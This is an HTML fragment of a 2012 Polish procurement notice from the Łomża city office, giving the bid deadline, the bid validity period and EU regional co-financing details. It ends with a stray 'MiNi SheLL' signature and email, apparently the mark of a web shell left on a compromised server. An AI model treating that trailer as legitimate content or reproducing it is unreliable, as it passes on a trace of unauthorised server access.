<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.07.2012 godzina 09:00, miejsce: Urząd Miejski w Łomży,
ul. Stary Rynek 14
18-400 Łomża
pokój nr 102 (sekretariat  Zastępców Prezydenta Miasta ) I piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamawiane prace przewidziane są do dofinansowania ze środków Unii Europejskiej w ramach Regionalnego Programu Operacyjnego Województwa Podlaskiego na lata 2007-2013 Osi Priorytetowej I. Wzrost innowacyjności i wspieranie przedsiębiorczości w regionie, Działanie 1.2 Region atrakcyjny inwestycjom, Poddziałanie 1.2.1 Tereny inwestycyjne - Projekt Nr WND-RPPD.01.02.01-20-005/11.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com